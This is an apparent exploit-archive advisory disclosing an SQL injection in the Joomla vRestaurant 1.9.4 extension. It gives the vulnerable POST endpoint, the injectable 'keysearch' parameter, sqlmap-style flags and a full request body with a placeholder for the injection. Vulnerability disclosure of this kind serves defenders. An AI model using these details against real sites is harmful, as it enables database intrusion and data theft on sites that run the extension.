Joomla vRestaurant 1.9.4 SQL Injection

Joomla vRestaurant extension version 1.9.4 suffers from a remote SQL injection vulnerability.


MD5 | cf5a4debabfd32f2851a9c95cb300d1d

################################################
#Title: Joomla! vRestaurant 1.9.4 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: https://www.wdmtech.com
#URL:
https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/vrestaurant/
#Product: 'Joomla! vRestaurant 1.9.4'
#Developer: WDMtech
#Extension type: Plugin
#Last updated: Jul 11 2017
#Compatibility: 3.X
#Type: Paid download
#Google Dork: N/A
################################################
#
# Description:
# vRestaurant is a Joomla component which adds amazing features to your
Website for restaurant or help you creating an online restaurant search and
discovery service providing portal.
#
#
# --Method=POST -p [keysearch]
#
# -u "http://127.0.0.1/menu-listing-layout/menuitems"
#
#
--data="csmodid=236&Itemid=303&keysearch=a[SQLI]&categories%5B%5D=2&categories%5B%5D=3&categories%5B%5D=4&categories%5B%5D=5&categories%5B%5D=6&categories%5B%5D=7&veg_nonveg=veg&min=10&max=100&Itemid=323"
#
# PoC:
# https://prnt.sc/hwfaya
#
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################

Related Posts

Comments